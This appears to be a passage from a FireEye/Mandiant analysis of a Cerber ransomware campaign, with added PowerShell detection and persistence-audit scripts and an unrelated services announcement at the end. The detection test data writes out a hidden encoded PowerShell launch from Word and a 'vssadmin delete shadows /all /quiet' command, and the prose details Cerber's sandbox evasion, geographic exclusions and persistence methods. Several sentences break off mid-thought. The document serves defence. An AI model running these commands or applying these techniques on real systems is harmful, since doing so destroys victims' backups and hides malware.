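$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($placeholder))
$SampleRecords = @(
    @{ ParentImage = 'C:\Program Files\Microsoft Office\Office15\WINWORD.EXE'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand $encoded" }
    @{ ParentImage = 'C:\Users\victim\AppData\Roaming\{GUID-placeholder}\profilest.exe'
       Image       = 'C:\Windows\System32\vssadmin.exe'
       CommandLine = 'vssadmin.exe delete shadows /all /quiet' }
    @{ ParentImage = 'C:\Windows\explorer.exe'   # benign: an administrator running a maintenance script
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -NoProfile -File C:\scripts\backup.ps1' }
)
$SampleRecords | Test-CerberChain | Format-Table -AutoSize
```

The first record should report all five reasons and the second the vssadmin reason; the third produces no finding, which is the point of keying on the Office parent rather than on PowerShell alone.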
Cerber in Action
Initial payload behavior
Upon execution, the Cerber malware will check to see where it is
being launched from. Unless it is being launched from a specific
location (%APPDATA%\<GUID>), it creates a copy of itself
in the victim's %APPDATA% folder under a filename chosen randomly and
obtained from the %WINDIR%\system32 folder.
If the malware is launched from the specific aforementioned folder
and after eliminating any blacklisted filenames from an internal list,
then the malware creates a renamed copy of itself to
“%APPDATA%\<GUID>” using a pseudo-randomly selected name
from the “system32” directory. It then executes the copy from
the new location and cleans up after itself.
As with many other ransomware families, Cerber will bypass UAC
checks, delete any volume shadow copies and disable safe boot options.
Cerber accomplished this by launching the following processes using
People may wonder why victims pay the ransom to the threat actors.
In some cases it is as simple as needing to get files back, but in
other instances a victim may feel coerced or even intimidated. We
noticed these tactics being used in this campaign, where the victim is
shown the message in Figure 2 upon being infected with Cerber.
Figure 2. A message to the victim after encryption
The ransomware authors attempt to incentivize the victim into paying
quickly by providing a 50 percent discount if the ransom is paid
within a certain timeframe, as seen in Figure 3.
Figure 3. Ransom offered to victim, which is
discounted for five days
As seen in Figure 4, the Cerber ransomware presented its message and
instructions in 12 different languages, indicating this attack was on
a global scale.
Figure 4. Interface provided to the victim to
pay ransom supports 12 languages
Cerber targets 294 different file extensions for encryption,
including .doc (typically Microsoft Word documents), .ppt (generally
Microsoft PowerPoint slideshows), .jpg and other images. It also
targets financial file formats such as .ibank (used with certain
personal finance management software) and .wallet (used for Bitcoin).
Selective targeting was used in this campaign. The attackers were
observed checking the country code of a host machine’s public IP
address against a list of blacklisted countries in the JSON
configuration, utilizing online services such as ipinfo.io to verify
the information. Blacklisted (protected) countries include:
Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan,
Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.
The attack also checked a system's keyboard layout to further ensure
it avoided infecting machines in the attackers' geography:
1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik,
1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh,
1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin),
2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri
(Cyrillic), 2115—Uzbek (Cyrillic).
Selective targeting has historically been used to keep malware from
infecting endpoints within the author’s geographical region, thus
protecting them from the wrath of local authorities. The actor also
controls their exposure using this technique. In this case, there is
reason to suspect the attackers are based in Russia or the surrounding region.
Anti VM Checks
The malware searches for a series of hooked modules, specific
filenames and paths, and known sandbox volume serial numbers,
including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll,
Frz_State, C:\popupkiller.exe, C:\stimulator.exe,
C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40,
6CBBC508, 774E1682, 837F873E, 8B6F64BC.
Aside from the aforementioned checks and blacklisting, there is also
a wait option built in where the payload will delay execution on an
infected machine before it launches an encryption routine. This
technique was likely implemented to further avoid detection within
Once executed, Cerber deploys the following persistence techniques
to make sure a system remains infected:
A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
A shortcut (.lnk) file is added to the startup folder. This file references the ransomware, and Windows will execute the file immediately after the infected user logs in.
Common persistence methods such as the run and runonce keys are also used.
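An added example (not FireEye's code) that audits the four persistence locations just listed on a live host and rates each autostart target against Cerber's drop pattern (a renamed copy under %APPDATA%\<GUID> named after a system32 file). It assumes a Windows host with PowerShell 3 or later and reads only registry values and startup folders; nothing is modified.

```powershell
function Get-PersistenceEntries {
    # Collects (Location, Name, Target) for the four mechanisms listed above.
    $entries = @()

    # 1. Screensaver: HKCU\Control Panel\Desktop\SCRNSAVE.EXE runs when the session idles
    $desktop = Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -ErrorAction SilentlyContinue
    if ($desktop.'SCRNSAVE.EXE') {
        $entries += [pscustomobject]@{ Location = 'Screensaver'; Name = 'SCRNSAVE.EXE'; Target = $desktop.'SCRNSAVE.EXE' }
    }
    # 2. Command Processor AutoRun (the key name has a space): runs every time cmd.exe starts
    foreach ($hive in 'HKCU', 'HKLM') {
        $cp = Get-ItemProperty -Path "${hive}:\Software\Microsoft\Command Processor" -ErrorAction SilentlyContinue
        if ($cp.AutoRun) {
            $entries += [pscustomobject]@{ Location = "$hive Command Processor"; Name = 'AutoRun'; Target = $cp.AutoRun }
        }
    }
    # 3. Startup folders: each .lnk is resolved to the executable it points at
    $shell = New-Object -ComObject WScript.Shell
    foreach ($folder in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        foreach ($lnk in @(Get-ChildItem -Path $folder -Filter *.lnk -ErrorAction SilentlyContinue)) {
            $target = $shell.CreateShortcut($lnk.FullName).TargetPath
            $entries += [pscustomobject]@{ Location = 'Startup folder'; Name = $lnk.Name; Target = $target }
        }
    }
    # 4. Run / RunOnce in both hives
    foreach ($hive in 'HKCU', 'HKLM') {
        foreach ($key in 'Run', 'RunOnce') {
            $props = Get-ItemProperty -Path "${hive}:\Software\Microsoft\Windows\CurrentVersion\$key" -ErrorAction SilentlyContinue
            if (-not $props) { continue }
            foreach ($p in $props.PSObject.Properties) {
                if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are provider metadata
                $entries += [pscustomobject]@{ Location = "$hive $key"; Name = $p.Name; Target = $p.Value }
            }
        }
    }
    $entries
}

function Get-TargetVerdict {
    # Cerber writes its copy to %APPDATA%\<GUID> under a file name borrowed from system32, so a
    # target under %APPDATA% that shares its name with a system32 binary is the strongest signal;
    # anything under %APPDATA% still deserves a look.
    param([string]$Target)
    if (-not $Target) { return 'n/a' }
    # Strip surrounding quotes and arguments to isolate the executable path
    $exe = if ($Target.StartsWith('"')) { $Target.Split('"')[1] } else { $Target.Split(' ')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    $underAppData   = $exe.StartsWith($env:APPDATA, [StringComparison]::OrdinalIgnoreCase)
    $twinInSystem32 = Test-Path (Join-Path $env:WINDIR "System32\$([IO.Path]::GetFileName($exe))")
    if ($underAppData -and $twinInSystem32) { return 'HIGH: %APPDATA% binary named like a system32 file' }
    if ($underAppData) { return 'MEDIUM: autostart target under %APPDATA%' }
    return 'ok'
}

Get-PersistenceEntries | ForEach-Object {
    $_ | Add-Member -NotePropertyName Verdict -NotePropertyValue (Get-TargetVerdict -Target $_.Target) -PassThru
} | Format-Table -AutoSize
```

Run it from the affected user's session, since the screensaver value and the HKCU keys belong to that profile; the HKLM and common-startup locations are only fully readable with administrative rights.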
A Solid Defense
Mitigating ransomware malware has become a high priority for
affected organizations because passive security technologies such as
signature-based containment have proven ineffective.
Malware authors have demonstrated an ability to outpace most endpoint
controls by compiling multiple variations of their malware with minor
binary differences. By using alternative packers and compilers,
authors are increasing the level of effort for researchers and
reverse-engineers. Unfortunately, those efforts don’t scale.
Disabling support for macros in documents from the Internet and
increasing user awareness are two ways to reduce the likelihood of
infection. If you can, consider blocking connections to websites you
haven’t explicitly whitelisted. However, these controls may not be
sufficient to prevent all infections or they may not be possible based
on your organization.
FireEye Endpoint Security with Exploit Guard
helps to detect exploits and techniques used by ransomware attacks
(and other threat activity) during execution and provides analysts
with greater visibility. This helps your security team conduct more
detailed investigations of broader categories of threats. This
information enables your organization to quickly stop threats and
adapt defenses as needed.
Ransomware has become an increasingly common and effective attack
affecting enterprises, impacting productivity and preventing users
from accessing files and data.
Mitigating the threat of ransomware requires strong endpoint
controls, and may include technologies that allow security personnel
to quickly analyze multiple systems and correlate events to identify
and respond to threats.
HX with Exploit Guard uses behavioral
intelligence to accelerate this process, quickly analyzing endpoints
within your enterprise and alerting your team so they can conduct an
investigation and scope the compromise in real-time.
Traditional defenses don’t have the granular view required to do
this, nor can they connect the dots of discrete individual processes
that may be steps in an attack. This takes behavioral intelligence
that is able to quickly analyze a wide array of processes and alert on
them so analysts and security teams can conduct a complete
investigation into what has transpired or is transpiring. This can only be done
if those professionals have the right tools and the visibility into
all endpoint activity to effectively find every aspect of a threat and
deal with it, all in real-time. Also, at FireEye, we go one step ahead
and contact relevant authorities to bring down these types of campaigns.
Every day at Mandiant we respond to some of the largest cyber
security incidents around the world. This gives us a front-row seat
to witness what works (and what doesn't) when it comes to finding
attackers and preventing them from stealing our clients' data.
Attackers' tactics and motives are evolving and as a result our
security strategies also need to adapt. Today, we announced two new service offerings that
will further help our clients improve their protective, detective,
and responsive security controls and leverage Mandiant's extensive
experience responding to some of the most serious cyber security
Our first new service offering addresses attackers'
expanding motives. We are starting to see attackers with destructive
motives and what could be more damaging than attacking a nation's
critical infrastructure. Security incidents at critical
infrastructure such as electric power grids, utilities and
manufacturing companies can affect the lives of hundreds of
thousands of people. Our new Industrial Control Systems (ICS) Security Gap
Assessment is specifically focused on helping these industries -
and others that use SCADA systems - to assess their existing
security processes for industrial control systems. The service helps
identify security GAPs and provides specific recommendations to
close those GAPs and safeguard critical infrastructure.
Our second new service offering is designed to help organizations
address the challenges they face as they build out their own
internal security operations program and incident response teams.
Many organizations want to enhance their internal capabilities
beyond the traditional security operations centers (SOCs). Our new
Cyber Defense Center Development service helps
organizations evolve their internal SOC by improving the visibility
(monitoring and detection) and response capabilities (incident
response) necessary to defend against advanced threats. This service
looks at existing people, process, and technologies and identifies
areas for improvement. It helps companies to identify and prioritize
the alerts that require the most immediate action with the goal to
reduce the mean time to remediation.
If either of these new
services sound like something that could help your organization let us